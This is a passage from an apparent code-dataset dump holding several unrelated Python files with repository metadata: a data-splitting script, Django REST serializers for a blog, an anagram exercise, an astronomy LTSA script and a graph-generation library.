    df['low'] = list(data['low'])
    df['close'] = list(data['close'])
    df['close_change'] = list(data['close-change'])
    df['date'] = [i.strftime('%Y-%m-%d %H:%M:%S') for i in df['date']]
    return df


data = new_feature(data)
final_data = process(data)

train_size = int(final_data.shape[0] * config['train_ratio'])
# Split at train_size exactly: the previous `train_size + 1` start index
# silently dropped the row at index train_size from both sets.
train_data, test_data = final_data[:train_size], final_data[train_size:]

train_data.to_csv('data/feature/train.csv', index=False)
test_data.to_csv('data/feature/test.csv', index=False)
none
1
2.882082
3
blogsite/blog/serializers.py
imakshayverma/blogapi
0
6618562
from rest_framework.serializers import ModelSerializer
from rest_framework import serializers

from .models import (
    Post,
    Paragraph,
    Comment
)


class ParagraphSerializer(ModelSerializer):
    """Flat representation of a single paragraph of a post."""

    class Meta:
        model = Paragraph
        fields = ['id', 'content', 'sequence']


class CommentSerializer(ModelSerializer):
    """Representation of a comment attached to a paragraph."""

    class Meta:
        model = Comment
        fields = ['comment_text', 'timestamp']


class ParagraphWithCommentsSerializer(ModelSerializer):
    """Paragraph plus its nested comments."""

    comment = CommentSerializer(many=True)

    class Meta:
        model = Paragraph
        fields = ['id', 'content', 'sequence', 'comment']


class PostListSerializer(ModelSerializer):
    """Post with its paragraphs, used for list views."""

    content = ParagraphSerializer(many=True)

    class Meta:
        model = Post
        fields = ['id', 'title', 'content', 'timestamp']


class PostSerializer(ModelSerializer):
    """Write serializer: accepts the post body as one text blob."""

    content = serializers.CharField()

    class Meta:
        model = Post
        fields = ['title', 'timestamp', 'content']

    def create(self, validated_data):
        """
        Explicit definition to add respective objects to their
        respective models - Post and Paragraph.
        """
        raw_text = validated_data.pop('content')
        post = Post.objects.create(**validated_data)
        # Paragraphs are separated by blank lines; empty chunks are skipped
        # and the remaining ones are numbered sequentially from 1.
        chunks = [part.strip('\n') for part in raw_text.split('\n\n')]
        sequence = 0
        for text in chunks:
            if not text:
                continue
            sequence += 1
            Paragraph.objects.create(post_id=post, content=text,
                                     sequence=sequence)
        return post


class PostShowSerializer(ModelSerializer):
    """Read serializer: post with paragraphs and their comments."""

    content = ParagraphWithCommentsSerializer(many=True)

    class Meta:
        model = Post
        fields = ['id', 'title', 'timestamp', 'content']
en
0.912089
Explicit definition to add respective objects to their respective models - Post and Paragraph.
2.379634
2
anagram/anagram.py
gordonli08/Exercism-python
0
6618563
def find_anagrams(word, candidates):
    """Return the candidates that are anagrams of *word*.

    Comparison is case-insensitive, and a candidate that is merely a
    different-cased spelling of *word* itself does not count as an anagram.

    Args:
        word: The subject string.
        candidates: Iterable of candidate strings.

    Returns:
        List of matching candidates, in their original order and casing.
    """
    # Hoist the loop-invariant normalisations of the subject word
    # (previously partially recomputed for every candidate).
    target = word.lower()
    signature = sorted(target)
    return [c for c in candidates
            if c.lower() != target and sorted(c.lower()) == signature]
none
1
3.757511
4
playground/try_ltsa.py
mikeireland/funnelweb
0
6618564
<reponame>mikeireland/funnelweb<gh_stars>0 """ n_neighbors 20, n_known 570 Teff had MAD: 139.1, StDev: 1777.5 logg had MAD: 0.07, StDev: 0.34 Fe_H had MAD: 0.07, StDev: 0.20 alpha_Fe had MAD: 0.06, StDev: 0.14 n_neighbors 20, n_known 570 Teff had MAD: 208.9, StDev: 1728.1 logg had MAD: 0.11, StDev: 0.40 Fe_H had MAD: 0.07, StDev: 0.19 alpha_Fe had MAD: 0.05, StDev: 0.14 n_neighbors 20, n_known 1140 Teff had MAD: 445.1, StDev: 2686.3 logg had MAD: 0.17, StDev: 0.58 Fe_H had MAD: 0.07, StDev: 0.23 alpha_Fe had MAD: 0.04, StDev: 0.12 n_neighbors 20, n_known 1140 Teff had MAD: 388.4, StDev: 2850.1 logg had MAD: 0.16, StDev: 0.53 Fe_H had MAD: 0.06, StDev: 0.20 alpha_Fe had MAD: 0.04, StDev: 0.12 n_neighbors 20, n_known 285 Teff had MAD: 123.8, StDev: 3169.5 logg had MAD: 0.09, StDev: 0.43 Fe_H had MAD: 0.10, StDev: 0.27 alpha_Fe had MAD: 0.08, StDev: 0.16 n_neighbors 10, n_known 570 Teff had MAD: 248.4, StDev: 2957.9 logg had MAD: 0.12, StDev: 0.73 Fe_H had MAD: 0.06, StDev: 0.24 alpha_Fe had MAD: 0.04, StDev: 0.16 n_neighbors 10, n_known 570 Teff had MAD: 160.6, StDev: 2542.1 logg had MAD: 0.07, StDev: 0.61 Fe_H had MAD: 0.06, StDev: 0.26 alpha_Fe had MAD: 0.05, StDev: 0.16 n_neighbors 15, n_known 570 Teff had MAD: 270.7, StDev: 2862.6 logg had MAD: 0.12, StDev: 0.55 Fe_H had MAD: 0.06, StDev: 0.19 alpha_Fe had MAD: 0.05, StDev: 0.14 n_neighbors 25, n_known 570 Teff had MAD: 205.4, StDev: 2022.6 logg had MAD: 0.13, StDev: 0.46 Fe_H had MAD: 0.08, StDev: 0.18 alpha_Fe had MAD: 0.07, StDev: 0.14 n_neighbors 30, n_known 570 Teff had MAD: 244.2, StDev: 1991.7 logg had MAD: 0.13, StDev: 0.44 Fe_H had MAD: 0.10, StDev: 0.23 alpha_Fe had MAD: 0.07, StDev: 0.14 """ from __future__ import division, print_function import numpy as np import matplotlib.pyplot as plt import matplotlib.cm as cm import astropy.io.fits as pyfits import pdb plt.ion() n_neighbors = 40 #Called "k" in Yang (2006) n_dim = 4 n_known=570*2 beta = 1e3 #1e3 or 1 #Import the data spect = 
pyfits.getdata('ccd1.fits') spect += np.random.normal(size=spect.shape)*1e-2 params = pyfits.getdata('ccd1.fits', 1) #params.names are the names of parameters. for s in spect: s /= np.mean(s) #Pick some random reference spectra. ref_obj = (np.random.random(500)*spect.shape[0]).astype(int) print("Finding pairwise distances") ssum = np.sum(spect**2, 1) dist_squared = np.tile(ssum, spect.shape[0]).reshape((spect.shape[0], spect.shape[0])) + \ np.repeat(ssum, spect.shape[0]).reshape((spect.shape[0], spect.shape[0])) - \ 2*np.dot(spect, spect.T) I_neighborhood = np.eye(n_neighbors) M_align = np.zeros( (spect.shape[0], spect.shape[0]) ) print("Creating Matrix M") #Now find the neighborhood of each spectrum neighbors = np.zeros( (spect.shape[0], n_neighbors), dtype=np.int) for i in range(spect.shape[0]): s = np.argsort(dist_squared[i]) neighbors[i] = s[:n_neighbors] #Find the principle components. X = spect[neighbors[i],:] X_mn = X.mean(axis=0) for j in range(n_neighbors): X[j] -= X_mn cov = np.dot(X, X.T) W, V = np.linalg.eigh(cov) G = np.append(np.ones( (n_neighbors,1) )/np.sqrt(n_neighbors), V[:,-n_dim:], 1) M_align[np.meshgrid(neighbors[i], neighbors[i], indexing='ij')] +=\ I_neighborhood - np.dot(G, G.T) #OK... now we go through and add the constraints. known_objects = (np.random.random( n_known )*spect.shape[0]).astype(int) y_ltsa = np.zeros( (n_dim, spect.shape[0]) ) for i in range(np.min([len(params.names), n_dim])): y_ltsa[i, known_objects] = beta*params[params.names[i]][known_objects] #!!! includes beta unknown_objects = np.where(y_ltsa[0] ==0)[0] if beta == 1: print("Solving system of equations") #Equation (12) of Yang et al. 
M12 = M_align[np.meshgrid(unknown_objects, known_objects, indexing='ij')] M22 = M_align[np.meshgrid(unknown_objects, unknown_objects, indexing='ij')] for i in range(n_dim): y_ltsa[i, unknown_objects] = np.linalg.solve(M22, -np.dot(M12, params[params.names[i]][known_objects])) else: M_nonsup = M_align.copy() M_align[known_objects, known_objects] += beta for i in range(n_dim): #Equation (21) of Yang et al. y_ltsa[i] = np.linalg.solve(M_align, y_ltsa[i]) #Median absolute deviations... deviates = np.zeros_like(y_ltsa) for i in range(n_dim): deviates[i] = y_ltsa[i] - params[params.names[i]] mad_unknown = np.median(np.abs(deviates[:,unknown_objects]), axis=1) std_unknown = np.std(deviates[:,unknown_objects], axis=1) mad_known = np.median(np.abs(deviates[:,known_objects]), axis=1) std_known = np.std(deviates[:,known_objects], axis=1) print("n_neighbors {}, n_known {}".format(n_neighbors, n_known)) print(params.names[0] + " had unknown MAD: {:5.1f}, StDev: {:5.1f}".format(mad_unknown[0], std_unknown[0])) for i in range(1,4): print(params.names[i] + " had unknown MAD: {:5.2f}, StDev: {:5.2f}".format(mad_unknown[i], std_unknown[i])) print(params.names[0] + " had known MAD: {:5.1f}, StDev: {:5.1f}".format(mad_known[0], std_known[0])) for i in range(1,4): print(params.names[i] + " had known MAD: {:5.2f}, StDev: {:5.2f}".format(mad_known[i], std_known[i])) log_teff = np.log10(np.minimum(y_ltsa[0,unknown_objects], 30e3)) plt.clf() plt.scatter(y_ltsa[2,unknown_objects], y_ltsa[3,unknown_objects],c=log_teff, cmap=cm.jet_r,s=1) plt.colorbar() plt.scatter(y_ltsa[2,known_objects], y_ltsa[3,known_objects], color='black', s=20, marker='x') plt.axis([-2.5,1,-0.2,0.6]) plt.xlabel('[M/H]') plt.ylabel(r'[$\alpha$/Fe]')
""" n_neighbors 20, n_known 570 Teff had MAD: 139.1, StDev: 1777.5 logg had MAD: 0.07, StDev: 0.34 Fe_H had MAD: 0.07, StDev: 0.20 alpha_Fe had MAD: 0.06, StDev: 0.14 n_neighbors 20, n_known 570 Teff had MAD: 208.9, StDev: 1728.1 logg had MAD: 0.11, StDev: 0.40 Fe_H had MAD: 0.07, StDev: 0.19 alpha_Fe had MAD: 0.05, StDev: 0.14 n_neighbors 20, n_known 1140 Teff had MAD: 445.1, StDev: 2686.3 logg had MAD: 0.17, StDev: 0.58 Fe_H had MAD: 0.07, StDev: 0.23 alpha_Fe had MAD: 0.04, StDev: 0.12 n_neighbors 20, n_known 1140 Teff had MAD: 388.4, StDev: 2850.1 logg had MAD: 0.16, StDev: 0.53 Fe_H had MAD: 0.06, StDev: 0.20 alpha_Fe had MAD: 0.04, StDev: 0.12 n_neighbors 20, n_known 285 Teff had MAD: 123.8, StDev: 3169.5 logg had MAD: 0.09, StDev: 0.43 Fe_H had MAD: 0.10, StDev: 0.27 alpha_Fe had MAD: 0.08, StDev: 0.16 n_neighbors 10, n_known 570 Teff had MAD: 248.4, StDev: 2957.9 logg had MAD: 0.12, StDev: 0.73 Fe_H had MAD: 0.06, StDev: 0.24 alpha_Fe had MAD: 0.04, StDev: 0.16 n_neighbors 10, n_known 570 Teff had MAD: 160.6, StDev: 2542.1 logg had MAD: 0.07, StDev: 0.61 Fe_H had MAD: 0.06, StDev: 0.26 alpha_Fe had MAD: 0.05, StDev: 0.16 n_neighbors 15, n_known 570 Teff had MAD: 270.7, StDev: 2862.6 logg had MAD: 0.12, StDev: 0.55 Fe_H had MAD: 0.06, StDev: 0.19 alpha_Fe had MAD: 0.05, StDev: 0.14 n_neighbors 25, n_known 570 Teff had MAD: 205.4, StDev: 2022.6 logg had MAD: 0.13, StDev: 0.46 Fe_H had MAD: 0.08, StDev: 0.18 alpha_Fe had MAD: 0.07, StDev: 0.14 n_neighbors 30, n_known 570 Teff had MAD: 244.2, StDev: 1991.7 logg had MAD: 0.13, StDev: 0.44 Fe_H had MAD: 0.10, StDev: 0.23 alpha_Fe had MAD: 0.07, StDev: 0.14 """ from __future__ import division, print_function import numpy as np import matplotlib.pyplot as plt import matplotlib.cm as cm import astropy.io.fits as pyfits import pdb plt.ion() n_neighbors = 40 #Called "k" in Yang (2006) n_dim = 4 n_known=570*2 beta = 1e3 #1e3 or 1 #Import the data spect = pyfits.getdata('ccd1.fits') spect += 
np.random.normal(size=spect.shape)*1e-2 params = pyfits.getdata('ccd1.fits', 1) #params.names are the names of parameters. for s in spect: s /= np.mean(s) #Pick some random reference spectra. ref_obj = (np.random.random(500)*spect.shape[0]).astype(int) print("Finding pairwise distances") ssum = np.sum(spect**2, 1) dist_squared = np.tile(ssum, spect.shape[0]).reshape((spect.shape[0], spect.shape[0])) + \ np.repeat(ssum, spect.shape[0]).reshape((spect.shape[0], spect.shape[0])) - \ 2*np.dot(spect, spect.T) I_neighborhood = np.eye(n_neighbors) M_align = np.zeros( (spect.shape[0], spect.shape[0]) ) print("Creating Matrix M") #Now find the neighborhood of each spectrum neighbors = np.zeros( (spect.shape[0], n_neighbors), dtype=np.int) for i in range(spect.shape[0]): s = np.argsort(dist_squared[i]) neighbors[i] = s[:n_neighbors] #Find the principle components. X = spect[neighbors[i],:] X_mn = X.mean(axis=0) for j in range(n_neighbors): X[j] -= X_mn cov = np.dot(X, X.T) W, V = np.linalg.eigh(cov) G = np.append(np.ones( (n_neighbors,1) )/np.sqrt(n_neighbors), V[:,-n_dim:], 1) M_align[np.meshgrid(neighbors[i], neighbors[i], indexing='ij')] +=\ I_neighborhood - np.dot(G, G.T) #OK... now we go through and add the constraints. known_objects = (np.random.random( n_known )*spect.shape[0]).astype(int) y_ltsa = np.zeros( (n_dim, spect.shape[0]) ) for i in range(np.min([len(params.names), n_dim])): y_ltsa[i, known_objects] = beta*params[params.names[i]][known_objects] #!!! includes beta unknown_objects = np.where(y_ltsa[0] ==0)[0] if beta == 1: print("Solving system of equations") #Equation (12) of Yang et al. 
M12 = M_align[np.meshgrid(unknown_objects, known_objects, indexing='ij')] M22 = M_align[np.meshgrid(unknown_objects, unknown_objects, indexing='ij')] for i in range(n_dim): y_ltsa[i, unknown_objects] = np.linalg.solve(M22, -np.dot(M12, params[params.names[i]][known_objects])) else: M_nonsup = M_align.copy() M_align[known_objects, known_objects] += beta for i in range(n_dim): #Equation (21) of Yang et al. y_ltsa[i] = np.linalg.solve(M_align, y_ltsa[i]) #Median absolute deviations... deviates = np.zeros_like(y_ltsa) for i in range(n_dim): deviates[i] = y_ltsa[i] - params[params.names[i]] mad_unknown = np.median(np.abs(deviates[:,unknown_objects]), axis=1) std_unknown = np.std(deviates[:,unknown_objects], axis=1) mad_known = np.median(np.abs(deviates[:,known_objects]), axis=1) std_known = np.std(deviates[:,known_objects], axis=1) print("n_neighbors {}, n_known {}".format(n_neighbors, n_known)) print(params.names[0] + " had unknown MAD: {:5.1f}, StDev: {:5.1f}".format(mad_unknown[0], std_unknown[0])) for i in range(1,4): print(params.names[i] + " had unknown MAD: {:5.2f}, StDev: {:5.2f}".format(mad_unknown[i], std_unknown[i])) print(params.names[0] + " had known MAD: {:5.1f}, StDev: {:5.1f}".format(mad_known[0], std_known[0])) for i in range(1,4): print(params.names[i] + " had known MAD: {:5.2f}, StDev: {:5.2f}".format(mad_known[i], std_known[i])) log_teff = np.log10(np.minimum(y_ltsa[0,unknown_objects], 30e3)) plt.clf() plt.scatter(y_ltsa[2,unknown_objects], y_ltsa[3,unknown_objects],c=log_teff, cmap=cm.jet_r,s=1) plt.colorbar() plt.scatter(y_ltsa[2,known_objects], y_ltsa[3,known_objects], color='black', s=20, marker='x') plt.axis([-2.5,1,-0.2,0.6]) plt.xlabel('[M/H]') plt.ylabel(r'[$\alpha$/Fe]')
en
0.895179
n_neighbors 20, n_known 570 Teff had MAD: 139.1, StDev: 1777.5 logg had MAD: 0.07, StDev: 0.34 Fe_H had MAD: 0.07, StDev: 0.20 alpha_Fe had MAD: 0.06, StDev: 0.14 n_neighbors 20, n_known 570 Teff had MAD: 208.9, StDev: 1728.1 logg had MAD: 0.11, StDev: 0.40 Fe_H had MAD: 0.07, StDev: 0.19 alpha_Fe had MAD: 0.05, StDev: 0.14 n_neighbors 20, n_known 1140 Teff had MAD: 445.1, StDev: 2686.3 logg had MAD: 0.17, StDev: 0.58 Fe_H had MAD: 0.07, StDev: 0.23 alpha_Fe had MAD: 0.04, StDev: 0.12 n_neighbors 20, n_known 1140 Teff had MAD: 388.4, StDev: 2850.1 logg had MAD: 0.16, StDev: 0.53 Fe_H had MAD: 0.06, StDev: 0.20 alpha_Fe had MAD: 0.04, StDev: 0.12 n_neighbors 20, n_known 285 Teff had MAD: 123.8, StDev: 3169.5 logg had MAD: 0.09, StDev: 0.43 Fe_H had MAD: 0.10, StDev: 0.27 alpha_Fe had MAD: 0.08, StDev: 0.16 n_neighbors 10, n_known 570 Teff had MAD: 248.4, StDev: 2957.9 logg had MAD: 0.12, StDev: 0.73 Fe_H had MAD: 0.06, StDev: 0.24 alpha_Fe had MAD: 0.04, StDev: 0.16 n_neighbors 10, n_known 570 Teff had MAD: 160.6, StDev: 2542.1 logg had MAD: 0.07, StDev: 0.61 Fe_H had MAD: 0.06, StDev: 0.26 alpha_Fe had MAD: 0.05, StDev: 0.16 n_neighbors 15, n_known 570 Teff had MAD: 270.7, StDev: 2862.6 logg had MAD: 0.12, StDev: 0.55 Fe_H had MAD: 0.06, StDev: 0.19 alpha_Fe had MAD: 0.05, StDev: 0.14 n_neighbors 25, n_known 570 Teff had MAD: 205.4, StDev: 2022.6 logg had MAD: 0.13, StDev: 0.46 Fe_H had MAD: 0.08, StDev: 0.18 alpha_Fe had MAD: 0.07, StDev: 0.14 n_neighbors 30, n_known 570 Teff had MAD: 244.2, StDev: 1991.7 logg had MAD: 0.13, StDev: 0.44 Fe_H had MAD: 0.10, StDev: 0.23 alpha_Fe had MAD: 0.07, StDev: 0.14 #Called "k" in Yang (2006) #1e3 or 1 #Import the data #params.names are the names of parameters. #Pick some random reference spectra. #Now find the neighborhood of each spectrum #Find the principle components. #OK... now we go through and add the constraints. #!!! includes beta #Equation (12) of Yang et al. #Equation (21) of Yang et al. 
#Median absolute deviations...
1.300569
1
src/numgraph/distributions.py
gravins/NumGraph
0
6618565
import numpy as np
from collections import Counter
from numpy.typing import NDArray
from itertools import combinations
from typing import List, Callable, Optional
from numpy.random import Generator, default_rng
from numgraph.utils import remove_self_loops, to_undirected, coalesce


def erdos_renyi(num_nodes: int, prob: float, directed: bool = False,
                rng: Optional[Generator] = None) -> NDArray:
    """
    Returns a random graph, also known as an Erdos-Renyi graph or a binomial graph.
    The model chooses each of the possible edges with a defined probability.

    Parameters
    ----------
    num_nodes : int
        The number of nodes
    prob : float
        Probability of an edge
    directed : bool, optional
        If set to True, will return a directed graph, by default False
    rng : Generator, optional
        Numpy random number generator, by default None

    Returns
    -------
    NDArray
        The random graph (num_edges x 2)
    """
    assert num_nodes >= 0 and prob <= 1 and prob > 0

    if rng is None:
        rng = default_rng()

    # Sample every possible (i, j) edge independently.
    mask = rng.random((num_nodes, num_nodes)) <= prob

    if not directed:
        # Symmetrize so (i, j) implies (j, i).
        mask = mask + mask.T

    mask = remove_self_loops(mask)

    edge_list = np.argwhere(mask)
    return edge_list


def barabasi_albert(num_nodes: int, num_edges: int,
                    rng: Optional[Generator] = None) -> NDArray:
    """
    Returns a graph sampled from the Barabasi-Albert (BA) model.
    The graph is built incrementally by adding `num_edges` arcs from a new node
    to already existing ones with preferential attachment towards nodes with
    high degree.

    Parameters
    ----------
    num_nodes : int
        The number of nodes
    num_edges : int
        The number of edges
    rng : Optional[Generator], optional
        Numpy random number generator, by default None

    Returns
    -------
    NDArray
        The Barabasi-Albert (num_edges x 2)
    """
    assert num_nodes >= 0 and num_edges > 0 and num_edges < num_nodes

    if rng is None:
        rng = default_rng()

    sources, targets = np.arange(num_edges), rng.permutation(num_edges)

    for i in range(num_edges, num_nodes):
        # np.long was removed in NumPy 1.24; np.int64 is the equivalent dtype.
        sources = np.concatenate([sources, np.full((num_edges, ), i, dtype=np.int64)])
        # Sampling uniformly from the existing endpoint multiset implements
        # preferential attachment (high-degree nodes appear more often).
        choice = rng.choice(np.concatenate([sources, targets]), num_edges)
        targets = np.concatenate([targets, choice])

    sources, targets = sources.reshape((-1, 1)), targets.reshape((-1, 1))
    edge_list = np.concatenate([sources, targets], axis=1)
    edge_list = remove_self_loops(edge_list)
    edge_list = to_undirected(edge_list)
    return coalesce(edge_list)


def clique(num_nodes: int) -> NDArray:
    """
    Returns a complete graph, a.k.a. a clique.

    Parameters
    ----------
    num_nodes : int
        The number of nodes

    Returns
    -------
    NDArray
        The clique (num_edges x 2)
    """
    edge_list = np.array(list(combinations(range(num_nodes), r=2)))
    edge_list = to_undirected(edge_list)
    return coalesce(edge_list)


def stochastic_block_model(block_sizes: List[int], probs: List[List[float]],
                           generator: Callable,
                           rng: Optional[Generator] = None) -> NDArray:
    """
    Returns a stochastic block model graph. This model partitions the nodes in
    blocks of defined sizes, and places edges between pairs of nodes depending
    on a probability matrix. Such a matrix specifies edge probabilities between
    and inside blocks.

    Parameters
    ----------
    block_sizes : List[int]
        Sizes of blocks
    probs : List[List[float]]
        The squared probability matrix (num_blocks x num_blocks).
        The element i,j represents the edge probability between blocks i and j.
        The element i,i defines the edge probability inside block i.
    generator : Callable
        A callable that generates communities with size depending on block_sizes
    rng : Generator, optional
        Numpy random number generator, by default None

    Returns
    -------
    NDArray
        The stochastic block model graph (num_edges x 2)
    """
    assert all(block_sizes) and len(probs) == len(block_sizes)
    assert all([len(p) == len(probs) for p in probs]) and all([all(p) for p in probs])

    if rng is None:
        rng = default_rng()

    # Intra-block graphs, one per block, generated by the supplied callable.
    communities = [generator(b, probs[i][i], rng) for i, b in enumerate(block_sizes)]

    # Update communities's indices: offset each block into the global id space.
    sizes = {}
    first_id = 0
    for i in range(len(block_sizes)):
        communities[i] += first_id
        sizes[i] = first_id
        first_id += block_sizes[i]

    # Compute inter-block links.
    edges = []
    for i in range(len(probs)):
        for j in range(len(probs)):
            if i == j:
                continue
            p = probs[i][j]
            size_c1, size_c2 = block_sizes[i], block_sizes[j]
            mask = rng.random((size_c1, size_c2)) <= p
            inter_block_edges = np.argwhere(mask)
            inter_block_edges[:, 0] += sizes[i]
            inter_block_edges[:, 1] += sizes[j]
            edges.append(inter_block_edges)

    return np.concatenate(edges + communities)


def full_grid(height: int, width: int) -> NDArray:
    """
    Returns a full two-dimensional rectangular grid lattice graph
    (horizontal, vertical and diagonal neighbors).

    Example
    1 - 2 - 3
    | X | X |
    4 - 5 - 6

    Parameters
    ----------
    height : int
        Number of vertices in the vertical axis
    width : int
        Number of vertices in the horizontal axis

    Returns
    -------
    NDArray
        The full two-dimensional rectangular grid lattice graph (num_edges x 2)
    """
    w = width
    # Offsets to the 8 neighbors of a cell.  The original kernel listed `w`
    # twice and omitted `+1`, duplicating the downward edge and dropping the
    # right-neighbor edge entirely.
    kernel = np.array([-w - 1, -w, -w + 1, -1, 1, w - 1, w, w + 1])
    return grid(height, width, kernel)


def simple_grid(height: int, width: int) -> NDArray:
    """
    Returns a two-dimensional rectangular grid lattice graph
    (horizontal and vertical neighbors only).

    Example
    1 -- 2 -- 3
    |    |    |
    4 -- 5 -- 6

    Parameters
    ----------
    height : int
        Number of vertices in the vertical axis
    width : int
        Number of vertices in the horizontal axis

    Returns
    -------
    NDArray
        The two-dimensional rectangular grid lattice graph (num_edges x 2)
    """
    w = width
    kernel = np.array([-w, -1, 1, w])
    return grid(height, width, kernel)


def grid(height: int, width: int, kernel: NDArray) -> NDArray:
    """
    Auxiliary function for grid graph generation.

    Parameters
    ----------
    height : int
        Number of vertices in the vertical axis
    width : int
        Number of vertices in the horizontal axis
    kernel : NDArray
        The neighbor-offset kernel

    Returns
    -------
    NDArray
        The two-dimensional grid lattice graph (num_edges x 2)
    """
    num_nodes = height * width
    K = len(kernel)

    # np.long was removed in NumPy 1.24; np.int64 is the equivalent dtype.
    sources = np.arange(num_nodes, dtype=np.int64).repeat(K)
    targets = sources + np.tile(kernel, num_nodes)

    # Drop targets that fall outside the node id range.
    mask = (targets >= 0) & (targets < num_nodes)
    sources, targets = sources[mask].reshape((-1, 1)), targets[mask].reshape((-1, 1))
    edge_list = np.concatenate([sources, targets], axis=1)

    # Remove edges (u,v) from a boundary node to the first node of the new row.
    submask_1 = ((edge_list[:, 0] + 1) % width == 0) & ((edge_list[:, 1]) % width == 0)
    # As the graph is undirected, remove the corresponding edges (v, u).
    submask_2 = ((edge_list[:, 0]) % width == 0) & ((edge_list[:, 1] + 1) % width == 0)
    mask = ~(submask_1 | submask_2)

    return edge_list[mask]


def star(num_nodes: int, directed: bool = False) -> NDArray:
    """
    Returns a star graph.

    Parameters
    ----------
    num_nodes : int
        The number of nodes
    directed : bool, optional
        If set to True, will return a directed graph, by default False

    Returns
    -------
    NDArray
        The star graph (num_edges x 2)
    """
    # Node 0 is the hub; every other node connects to it.
    edges = np.stack([np.zeros((num_nodes - 1, ), dtype=int),
                      np.arange(1, num_nodes)], axis=1)

    if not directed:
        edges = to_undirected(edges)

    return edges


def random_tree(num_nodes: int, directed: bool = True,
                rng: Optional[Generator] = None) -> NDArray:
    """
    Returns a random tree computed using a random Prufer sequence.

    Parameters
    ----------
    num_nodes : int
        The number of nodes
    directed : bool, optional
        If set to True, will return a directed graph, by default True
    rng : Optional[Generator], optional
        Numpy random number generator, by default None

    Returns
    -------
    NDArray
        The random tree (num_edges x 2)
    """
    if rng is None:
        rng = default_rng()

    prufer_seq = [rng.choice(range(num_nodes)) for _ in range(num_nodes - 2)]

    # Node degree is equivalent to the number of times it appears in the
    # sequence + 1.
    degree = Counter(prufer_seq + list(range(num_nodes)))

    edges = []
    visited = set()
    for v in prufer_seq:
        for u in range(num_nodes):
            if degree[u] == 1:
                edges.append([v, u])
                degree[v] -= 1
                degree[u] -= 1
                visited.add(u)
                break

    # The two nodes never consumed by the sequence form the final edge.
    u, v = degree.keys() - visited
    edges.append([u, v])
    edges = np.asarray(edges)

    if not directed:
        edges = to_undirected(edges)

    return edges
import numpy as np from collections import Counter from numpy.typing import NDArray from itertools import combinations from typing import List, Callable, Optional from numpy.random import Generator, default_rng from numgraph.utils import remove_self_loops, to_undirected, coalesce def erdos_renyi(num_nodes: int, prob: float, directed: bool = False, rng: Optional[Generator] = None) -> NDArray: """ Returns a random graph, also known as an Erdos-Renyi graph or a binomial graph. The model chooses each of the possible edges with a defined probability. Parameters ---------- num_nodes : int The number of nodes prob : float Probability of an edge directed : bool, optional If set to True, will return a directed graph, by default False rng : Generator, optional Numpy random number generator, by default None Returns ------- NDArray The random graph (num_edges x 2) """ assert num_nodes >= 0 and prob <=1 and prob > 0 if rng is None: rng = default_rng() mask = rng.random((num_nodes, num_nodes)) <= prob if not directed: mask = mask + mask.T mask = remove_self_loops(mask) edge_list = np.argwhere(mask) return edge_list def barabasi_albert(num_nodes: int, num_edges: int, rng: Optional[Generator] = None) -> NDArray: """ Returns a graph sampled from the Barabasi-Albert (BA) model. The graph is built incrementally by adding `num_edges` arcs from a new node to already existing ones with preferential attachment towards nodes with high degree. 
Parameters ---------- num_nodes : int The number of nodes num_edges : int The number of edges rng : Optional[Generator], optional Numpy random number generator, by default None Returns ------- NDArray The Barabasi-Albert (num_edges x 2) """ assert num_nodes >= 0 and num_edges > 0 and num_edges < num_nodes if rng is None: rng = default_rng() sources, targets = np.arange(num_edges), rng.permutation(num_edges) for i in range(num_edges, num_nodes): sources = np.concatenate([sources, np.full((num_edges, ), i, dtype=np.long)]) choice = rng.choice(np.concatenate([sources, targets]), num_edges) targets = np.concatenate([targets, choice]) sources, targets = sources.reshape((-1, 1)), targets.reshape((-1, 1)) edge_list = np.concatenate([sources, targets], axis=1) edge_list = remove_self_loops(edge_list) edge_list = to_undirected(edge_list) return coalesce(edge_list) def clique(num_nodes: int) -> NDArray: """ Returns a complete graph, a.k.a. a clique. Parameters ---------- num_nodes : int The number of nodes Returns ------- NDArray The clique (num_edges x 2) """ edge_list = np.array(list(combinations(range(num_nodes), r=2))) edge_list = to_undirected(edge_list) return coalesce(edge_list) def stochastic_block_model(block_sizes: List[int], probs: List[List[float]], generator: Callable, rng: Optional[Generator] = None) -> NDArray: """ Returns a stochastic block model graph. This model partitions the nodes into blocks of defined sizes, and places edges between pairs of nodes depending on a probability matrix. Such a matrix specifies edge probabilities between and inside blocks. Parameters ---------- block_sizes : List[int] Sizes of blocks probs : List[List[float]] The squared probability matrix (num_blocks x num_blocks). The element i,j represents the edge probability between blocks i and j. The element i,i define the edge probability inside block i. 
generator : Callable A callable that generates communities with size depending on block_sizes rng : Generator, optional Numpy random number generator, by default None Returns ------- NDArray The stochastic block model graph (num_edges x 2) """ assert all(block_sizes) and len(probs) == len(block_sizes) assert all([len(p) == len(probs) for p in probs]) and all([all(p) for p in probs]) if rng is None: rng = default_rng() communities = [generator(b, probs[i][i], rng) for i, b in enumerate(block_sizes)] # Update communities's indices sizes = {} first_id = 0 for i in range(len(block_sizes)): communities[i] += first_id sizes[i] = first_id first_id += block_sizes[i] # Compute iter-block links edges = [] for i in range(len(probs)): for j in range(len(probs)): if i == j: continue p = probs[i][j] size_c1, size_c2 = block_sizes[i], block_sizes[j] mask = rng.random((size_c1, size_c2)) <= p inter_block_edges = np.argwhere(mask) inter_block_edges[:, 0] += sizes[i] inter_block_edges[:, 1] += sizes[j] edges.append(inter_block_edges) return np.concatenate(edges + communities) def full_grid(height: int, width: int) -> NDArray: """ Returns a full two-dimensional rectangular grid lattice graph. Example 1 - 2 - 3 | X | X | 4 - 5 - 6 Parameters ---------- height : int Number of vertices in the vertical axis width : int Number of vertices in the horizontal axis Returns ------- NDArray The full two-dimensional rectangular grid lattice graph (num_edges x 2) """ w = width kernel = np.array([-w - 1, -w, -w + 1, -1, w, w - 1, w, w + 1]) return grid(height, width, kernel) def simple_grid(height: int, width: int) -> NDArray: """ Returns a two-dimensional rectangular grid lattice graph. 
